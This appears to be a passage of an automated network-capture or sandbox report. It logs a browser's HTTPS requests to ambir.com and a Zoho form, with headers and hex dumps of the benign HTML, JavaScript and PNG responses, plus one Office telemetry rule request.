                                                                                                                                                                                              2024-11-20 20:28:21 UTC16384INData Raw: 61 74 68 3e 0a 09 20 20 20 09 3c 2f 73 79 6d 62 6f 6c 3e 0a 09 3c 21 2d 2d 20 77 61 72 6e 69 6e 67 20 70 6f 70 75 70 20 69 63 6f 6e 73 20 65 6e 64 73 20 2d 2d 3e 0a 0a 09 3c 21 2d 2d 20 55 6e 76 65 72 69 66 69 65 64 20 61 63 63 6f 75 6e 74 20 69 63 6f 6e 20 73 74 61 72 74 73 20 2d 2d 3e 0a 09 09 3c 73 79 6d 62 6f 6c 20 69 64 3d 22 69 63 6f 6e 2d 74 69 63 6b 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 0a 09 09 09 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 35 20 32 36 2e 31 63 2d 30 2e 33 20 30 2d 30 2e 35 2d 30 2e 31 2d 30 2e 37 2d 30 2e 33 6c 2d 38 2e 37 2d 38 2e 37 63 2d 30 2e 34 2d 30 2e 34 2d 30 2e 34 2d 31 20 30 2d 31 2e 34 73 31 2d 30 2e 34 20 31 2e 34 20 30 6c 38 20 38 20 31 37 2e 31 2d 31 37 2e 32 63 30 2e 34 2d 30 2e 34 20 31 2d
                                                                                                                                                                                              Data Ascii: ath> </symbol>... warning popup icons ends -->... Unverified account icon starts --><symbol id="icon-tick" viewBox="0 0 32 32"><path d="M11.5 26.1c-0.3 0-0.5-0.1-0.7-0.3l-8.7-8.7c-0.4-0.4-0.4-1 0-1.4s1-0.4 1.4 0l8 8 17.1-17.2c0.4-0.4 1-
                                                                                                                                                                                              2024-11-20 20:28:21 UTC16384INData Raw: 2f 75 73 65 3e 3c 2f 73 76 67 3e 3c 2f 65 6d 3e 0a 3c 73 70 61 6e 3e 4e 2f 41 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 6d 70 43 6f 6e 74 44 69 76 22 0a 0a 65 6c 65 6d 6e 61 6d 65 3d 22 66 69 65 6c 64 43 6f 6e 74 65 6e 74 44 69 76 22 20 69 6e 63 77 65 62 68 6b 5f 6e 61 6d 65 3d 22 66 69 65 6c 64 43 6f 6e 74 65 6e 74 44 69 76 22 3e 0a 0a 3c 64 69 76 20 0a 0a 0a 0a 63 6c 61 73 73 3d 22 66 6f 72 6d 5f 73 42 6f 78 22 20 20 0a 0a 0a 3e 0a 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 73 74 6f 6d 41 72 72 6f 77 22 3e 3c 2f 64 69 76 3e 3c 73 65 6c 65 63 74 20 69 64 3d 22 44 72 6f 70 64 6f 77 6e 31 2d 61 72 69 61 6c 61 62 65 6c 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 68 69 6e 74 2d 44 72 6f 70 64 6f 77
                                                                                                                                                                                              Data Ascii: /use></svg></em><span>N/A</span></div><div class="tempContDiv"elemname="fieldContentDiv" incwebhk_name="fieldContentDiv"><div class="form_sBox" ><div class="customArrow"></div><select id="Dropdown1-arialabel" aria-describedby="hint-Dropdow
                                                                                                                                                                                              2024-11-20 20:28:21 UTC16384INData Raw: 69 64 3d 22 77 61 69 74 44 69 76 22 20 63 6c 61 73 73 3d 22 7a 66 2d 6c 6f 61 64 69 6e 67 20 62 6c 61 63 6b 4c 6f 61 64 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 31 31 32 70 78 3b 20 6c 65 66 74 3a 20 35 36 38 2e 35 70 78 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 65 6c 6e 61 6d 65 3d 22 65 64 69 74 2d 66 6f 72 6d 2d 6d 73 67 22 3e 3c 73 70 61 6e 3e 49 41 4d 45 6e 63 6f 64 65 72 2e 65 6e 63 6f 64 65 48 54 4d 4c 28 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 29 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 7a 6f 68 6f 63 64 6e 2e 63 6f 6d 2f 66 6f 72 6d 73 2f 69 6d 61 67 65 73 2f 6c 6f 61 64 65 72 0d 0a 34 30 30 30 0d 0a 2e 37 39 64 65 31 62 39
                                                                                                                                                                                              Data Ascii: id="waitDiv" class="zf-loading blackLoad" style="position: absolute; top: 112px; left: 568.5px;display:none;" elname="edit-form-msg"><span>IAMEncoder.encodeHTML(successMessage)</span><img src="https://static.zohocdn.com/forms/images/loader4000.79de1b9
                                                                                                                                                                                              2024-11-20 20:28:21 UTC16384INData Raw: 73 3d 22 70 6f 70 75 70 48 65 61 64 65 72 22 20 65 6c 6e 61 6d 65 3d 22 63 61 6d 65 72 61 50 6f 70 75 70 48 65 61 64 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 4c 65 66 74 20 63 61 6d 44 72 6f 70 49 63 6f 6e 22 3e 3c 73 76 67 20 63 6c 61 73 73 3d 22 69 63 6f 6e 20 69 63 6f 6e 2d 77 65 62 63 61 6d 22 3e 3c 75 73 65 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 23 69 63 6f 6e 2d 77 65 62 63 61 6d 22 3e 3c 2f 75 73 65 3e 3c 2f 73 76 67 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 65 6c 6e 61 6d 65 3d 22 73 65 6c 65 63 74 43 61 6d 65 72 61 22 20 63 6c 61 73 73 3d 22 63 61 6d 65 72 61 44 72 6f 70 64 6f 77 6e 20 66 6f 72 6d 5f 73 42 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 73 74 6f 6d 41 72 72 6f 77 22 3e 3c 2f 64 69 76 3e 3c 73 0d 0a 35 62 35 65 0d 0a
                                                                                                                                                                                              Data Ascii: s="popupHeader" elname="cameraPopupHeader"><div class="flLeft camDropIcon"><svg class="icon icon-webcam"><use xlink:href="#icon-webcam"></use></svg></div><div elname="selectCamera" class="cameraDropdown form_sBox"><div class="customArrow"></div><s5b5e
                                                                                                                                                                                              2024-11-20 20:28:21 UTC7268INData Raw: 64 20 73 75 62 6d 69 73 73 69 6f 6e 20 6f 66 20 66 6f 72 6d 20 68 61 70 70 65 6e 73 2e 0a 2a 2f 0a 69 66 28 66 6c 64 43 6f 6d 70 54 79 70 65 20 21 3d 3d 20 5a 46 46 69 65 6c 64 54 79 70 65 43 6f 6e 73 74 61 6e 74 73 2e 5a 4f 48 4f 5f 43 52 4d 29 20 7b 20 2f 2f 20 57 68 65 6e 20 27 45 6e 74 65 72 27 20 6b 65 79 20 69 73 20 70 72 65 73 73 65 64 20 69 6e 20 5a 6f 68 6f 20 43 52 4d 20 66 69 65 6c 64 2c 20 74 68 65 20 66 6f 72 6d 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 73 75 62 6d 69 74 74 65 64 2e 0a 76 61 72 20 70 61 67 65 43 6f 75 6e 74 20 3d 20 24 28 22 23 66 6f 72 6d 42 6f 64 79 44 69 76 22 29 2e 66 69 6e 64 28 27 75 6c 5b 65 6c 6e 61 6d 65 3d 66 6f 72 6d 42 6f 64 79 55 4c 4e 61 6d 65 5d 27 29 2e 6c 65 6e 67 74 68 3b 0a 76 61 72 20 70 61 67 65 4e 75 6d 20
                                                                                                                                                                                              Data Ascii: d submission of form happens.*/if(fldCompType !== ZFFieldTypeConstants.ZOHO_CRM) { // When 'Enter' key is pressed in Zoho CRM field, the form must not be submitted.var pageCount = $("#formBodyDiv").find('ul[elname=formBodyULName]').length;var pageNum


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              33192.168.2.549762141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC602OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-804f7b28.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-36b75"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6832
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f94bff3176c-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:20 UTC878INData Raw: 37 64 63 35 0d 0a 0a 0a 76 61 72 20 77 70 63 66 37 20 3d 20 7b 0a 20 20 20 20 22 61 70 69 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 72 6f 6f 74 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6d 62 69 72 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 0a 20 20 20 20 20 20 20 20 22 6e 61 6d 65 73 70 61 63 65 22 3a 20 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 61 63 68 65 64 22 3a 20 31 0a 7d 3b 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 2e 77 70 2e 69 31 38 6e 2c 74 3d 65 3d 3e 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 2c 61 3d 28 65 2c 74 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 43 75 73 74 6f 6d
                                                                                                                                                                                              Data Ascii: 7dc5var wpcf7 = { "api": { "root": "https:\/\/ambir.com\/wp-json\/", "namespace": "contact-form-7\/v1" }, "cached": 1};(()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new Custom
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 74 61 74 75 73 22 2c 74 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 74 29 2c 72 26 26 72 21 3d 3d 74 29 7b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 72 29 3b 63 6f 6e 73 74 20 74 3d 7b 63 6f 6e 74 61 63 74 46 6f 72 6d 49 64 3a 65 2e 77 70 63 66 37 2e 69 64 2c 70 6c 75 67 69 6e 56 65 72 73 69 6f 6e 3a 65 2e 77 70 63 66 37 2e 70 6c 75 67 69 6e 56 65 72 73 69 6f 6e 2c 63 6f 6e 74 61 63 74 46 6f 72 6d 4c 6f 63 61 6c 65 3a 65 2e 77 70 63 66 37 2e 6c 6f 63 61 6c 65 2c 75 6e 69 74 54 61 67 3a 65 2e 77 70 63 66 37 2e 75 6e 69 74 54 61 67 2c 63 6f 6e 74 61 69 6e 65 72 50 6f 73 74 49 64 3a 65 2e 77 70 63 66 37 2e 63 6f 6e 74 61 69 6e 65 72 50 6f 73 74 2c 73 74 61 74 75 73
                                                                                                                                                                                              Data Ascii: ,e.setAttribute("data-status",t),e.classList.add(t),r&&r!==t){e.classList.remove(r);const t={contactFormId:e.wpcf7.id,pluginVersion:e.wpcf7.pluginVersion,contactFormLocale:e.wpcf7.locale,unitTag:e.wpcf7.unitTag,containerPostId:e.wpcf7.containerPost,status
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 21 65 2e 63 6f 6e 74 61 69 6e 73 28 61 29 29 72 65 74 75 72 6e 3b 69 66 28 21 61 2e 63 6c 6f 73 65 73 74 28 22 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 77 72 61 70 5b 64 61 74 61 2d 6e 61 6d 65 5d 22 29 29 72 65 74 75 72 6e 3b 69 66 28 61 2e 63 6c 6f 73 65 73 74 28 22 2e 6e 6f 76 61 6c 69 64 61 74 65 22 29 29 72 65 74 75 72 6e 7d 63 6f 6e 73 74 20 70 3d 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 77 72 61 70 22 29 2c 64 3d 41 72 72 61 79 2e 66 72 6f 6d 28 70 29 2e 72 65 64 75 63 65 28 28 28 65 2c 74 29 3d 3e 28 74 2e 63 6c 6f 73 65 73 74 28 22 2e 6e 6f 76 61 6c 69 64 61 74 65 22 29 7c 7c 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 77 68 65 72
                                                                                                                                                                                              Data Ascii: !e.contains(a))return;if(!a.closest(".wpcf7-form-control-wrap[data-name]"))return;if(a.closest(".novalidate"))return}const p=r.querySelectorAll(".wpcf7-form-control-wrap"),d=Array.from(p).reduce(((e,t)=>(t.closest(".novalidate")||t.querySelectorAll(":wher
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 22 3e 24 7b 61 7d 3c 2f 61 3e 60 29 3a 74 2e 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 54 65 78 74 28 22 62 65 66 6f 72 65 65 6e 64 22 2c 61 29 2c 65 2e 77 70 63 66 37 2e 70 61 72 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 75 6c 22 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 29 28 29 2c 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 77 72 61 70 5b 64 61 74 61 2d 6e 61 6d 65 3d 22 24 7b 74 7d 22 5d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 29 3b 74 2e 63 6c 61 73 73 4c 69 73 74
                                                                                                                                                                                              Data Ascii: ">${a}</a>`):t.insertAdjacentText("beforeend",a),e.wpcf7.parent.querySelector(".screen-reader-response ul").appendChild(t)})(),r.querySelectorAll(`.wpcf7-form-control-wrap[data-name="${t}"]`).forEach((e=>{const t=document.createElement("span");t.classList
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 65 74 43 75 73 74 6f 6d 56 61 6c 69 64 69 74 79 26 26 65 2e 73 65 74 43 75 73 74 6f 6d 56 61 6c 69 64 69 74 79 28 22 22 29 7d 29 29 7d 29 29 7d 2c 6c 3d 28 65 2c 74 2c 61 29 3d 3e 7b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 5b 64 61 74 61 2d 72 65 66 6c 65 63 74 69 6f 6e 2d 6f 66 3d 22 24 7b 74 7d 22 5d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 69 66 28 22 6f 75 74 70 75 74 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 63 6f 6e 73 74 20 74 3d 65 3b 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 26 26 61 2e 70 75 73 68 28 74 2e 64 61 74 61 73 65 74 2e 64 65 66 61 75 6c 74 29 2c 61 2e 73 6c 69 63 65 28 30 2c 31 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e
                                                                                                                                                                                              Data Ascii: tion"==typeof e.setCustomValidity&&e.setCustomValidity("")}))}))},l=(e,t,a)=>{e.querySelectorAll(`[data-reflection-of="${t}"]`).forEach((e=>{if("output"===e.tagName.toLowerCase()){const t=e;0===a.length&&a.push(t.dataset.default),a.slice(0,1).forEach((e=>
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 26 26 61 28 65 2c 60 6d 61 69 6c 24 7b 72 7d 60 2c 6f 29 2c 61 28 65 2c 22 73 75 62 6d 69 74 22 2c 6f 29 2c 74 7d 29 29 2e 74 68 65 6e 28 28 74 3d 3e 7b 74 2e 70 6f 73 74 65 64 5f 64 61 74 61 5f 68 61 73 68 26 26 28 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 5f 77 70 63 66 37 5f 70 6f 73 74 65 64 5f 64 61 74 61 5f 68 61 73 68 22 5d 27 29 2e 76 61 6c 75 65 3d 74 2e 70 6f 73 74 65 64 5f 64 61 74 61 5f 68 61 73 68 29 2c 22 6d 61 69 6c 5f 73 65 6e 74 22 3d 3d 3d 74 2e 73 74 61 74 75 73 26 26 28 65 2e 72 65 73 65 74 28 29 2c 65 2e 77 70 63 66 37 2e 72 65 73 65 74 4f 6e 4d 61 69 6c 53 65 6e 74 3d 21 30 29 2c 74 2e 69 6e 76 61 6c 69 64 5f 66 69 65 6c 64 73 26 26 74 2e 69 6e 76
                                                                                                                                                                                              Data Ascii: "].includes(r)&&a(e,`mail${r}`,o),a(e,"submit",o),t})).then((t=>{t.posted_data_hash&&(e.querySelector('input[name="_wpcf7_posted_data_hash"]').value=t.posted_data_hash),"mail_sent"===t.status&&(e.reset(),e.wpcf7.resetOnMailSent=!0),t.invalid_fields&&t.inv
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 69 6e 74 3a 22 72 65 66 69 6c 6c 22 2c 66 6f 72 6d 3a 65 2c 64 65 74 61 69 6c 3a 63 7d 7d 29 2e 74 68 65 6e 28 28 74 3d 3e 7b 65 2e 77 70 63 66 37 2e 72 65 73 65 74 4f 6e 4d 61 69 6c 53 65 6e 74 3f 28 64 65 6c 65 74 65 20 65 2e 77 70 63 66 37 2e 72 65 73 65 74 4f 6e 4d 61 69 6c 53 65 6e 74 2c 6e 28 65 2c 22 6d 61 69 6c 5f 73 65 6e 74 22 29 29 3a 6e 28 65 2c 22 69 6e 69 74 22 29 2c 63 2e 61 70 69 52 65 73 70 6f 6e 73 65 3d 74 2c 61 28 65 2c 22 72 65 73 65 74 22 2c 63 29 7d 29 29 2e 63 61 74 63 68 28 28 65 3d 3e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 29 29 7d 72 2e 75 73 65 28 28 28 65 2c 74 29 3d 3e 7b 69 66 28 65 2e 77 70 63 66 37 26 26 22 72 65 66 69 6c 6c 22 3d 3d 3d 65 2e 77 70 63 66 37 2e 65 6e 64 70 6f 69 6e 74 29 7b 63 6f 6e 73 74 7b 66 6f
                                                                                                                                                                                              Data Ascii: int:"refill",form:e,detail:c}}).then((t=>{e.wpcf7.resetOnMailSent?(delete e.wpcf7.resetOnMailSent,n(e,"mail_sent")):n(e,"init"),c.apiResponse=t,a(e,"reset",c)})).catch((e=>console.error(e)))}r.use(((e,t)=>{if(e.wpcf7&&"refill"===e.wpcf7.endpoint){const{fo
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 73 2d 73 70 69 6e 6e 65 72 22 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 28 22 61 66 74 65 72 65 6e 64 22 2c 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 77 70 63 66 37 2d 73 70 69 6e 6e 65 72 22 3e 3c 2f 73 70 61 6e 3e 27 29 7d 29 29 2c 28 65 3d 3e 7b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 77 70 63 66 37 2d 65 78 63 6c 75 73 69 76 65 2d 63 68 65 63 6b 62 6f 78 22 29 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 28 74 3d 3e 7b 63 6f 6e 73 74 20 61 3d 74 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 29 3b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28
                                                                                                                                                                                              Data Ascii: s-spinner").forEach((e=>{e.insertAdjacentHTML("afterend",'<span class="wpcf7-spinner"></span>')})),(e=>{e.querySelectorAll(".wpcf7-exclusive-checkbox").forEach((t=>{t.addEventListener("change",(t=>{const a=t.target.getAttribute("name");e.querySelectorAll(
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 77 70 63 66 37 72 65 73 65 74 22 2c 28 65 3d 3e 7b 74 28 29 7d 29 29 7d 29 28 65 29 2c 28 65 3d 3e 7b 63 6f 6e 73 74 20 61 3d 28 65 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 74 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 74 61 72 74 69 6e 67 2d 76 61 6c 75 65 22 29 29 2c 72 3d 74 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 61 78 69 6d 75 6d 2d 76 61 6c 75 65 22 29 29 2c 63 3d 74 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 69 6e 69 6d 75 6d 2d 76 61 6c 75 65 22 29 29 2c 6f 3d 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 6f 77 6e 22 29 3f 6e 2d 61 2e 76 61 6c 75 65 2e 74 72 69 6d 28 29 2e 6c 65 6e
                                                                                                                                                                                              Data Ascii: ,e.addEventListener("wpcf7reset",(e=>{t()}))})(e),(e=>{const a=(e,a)=>{const n=t(e.getAttribute("data-starting-value")),r=t(e.getAttribute("data-maximum-value")),c=t(e.getAttribute("data-minimum-value")),o=e.classList.contains("down")?n-a.value.trim().len
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 3e 7b 74 2e 74 61 72 67 65 74 2e 63 6c 6f 73 65 73 74 28 22 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 29 26 26 77 70 63 66 37 2e 76 61 6c 69 64 61 74 65 28 65 2c 7b 74 61 72 67 65 74 3a 74 2e 74 61 72 67 65 74 7d 29 7d 29 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 77 70 63 66 37 73 74 61 74 75 73 63 68 61 6e 67 65 64 22 2c 28 74 3d 3e 7b 63 6f 6e 73 74 20 61 3d 74 2e 64 65 74 61 69 6c 2e 73 74 61 74 75 73 3b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 61 63 74 69 76 65 2d 6f 6e 2d 61 6e 79 22 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 6e 65 72 74 22 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 61 63 74 69 76 65 2d
                                                                                                                                                                                              Data Ascii: >{t.target.closest(".wpcf7-form-control")&&wpcf7.validate(e,{target:t.target})})),e.addEventListener("wpcf7statuschanged",(t=>{const a=t.detail.status;e.querySelectorAll(".active-on-any").forEach((e=>{e.removeAttribute("inert"),e.classList.remove("active-


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              34192.168.2.549763141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC374OUTGET /wp-content/themes/ambir/images/search.png HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:20 UTC463INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                              Content-Length: 305
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origSize=363
                                                                                                                                                                                              ETag: "651c3a0e-16b"
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 10823
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f956ec643b1-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:20 UTC305INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 00 00 cc 49 44 41 54 78 da d5 92 c1 0d c3 20 0c 45 33 42 46 60 84 8c 90 51 38 f5 cc 08 d9 20 2b 78 84 8e c0 00 3d b0 01 23 d0 0d e8 3f 7c 24 14 61 05 ab ea a1 91 9e 22 c5 ce c3 7c 58 7e fe bc 1e cb 0e 04 64 50 49 04 01 ac 16 d1 0a 9e 9d 24 81 48 de fc 56 80 9f 92 51 50 29 75 83 1e df 4d 1d ee 84 6d b2 c3 b0 f0 ae 67 c6 c9 26 a3 71 8c 20 6b 0d 42 a1 33 e4 7d f2 9f 6d 54 cc 20 59 6f 82 1a 11 0b d1 28 74 06 e1 f7 13 46 50 8c 42 4f a1 1f 15 43 2b 1a 84 51 39 48 de 2d 5e 03 b0 1a a6 93 99 a6 04 dc 5d 1f b9 2c ae 6f bd 80 93 c1 3b
                                                                                                                                                                                              Data Ascii: PNGIHDR cHRMz%u0`:o_FIDATx E3BF`Q8 +x=#?|$a"|X~dPI$HVQP)uMmg&q kB3}mT Yo(tFPBOC+Q9H-^],o;


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              35192.168.2.54975813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 415
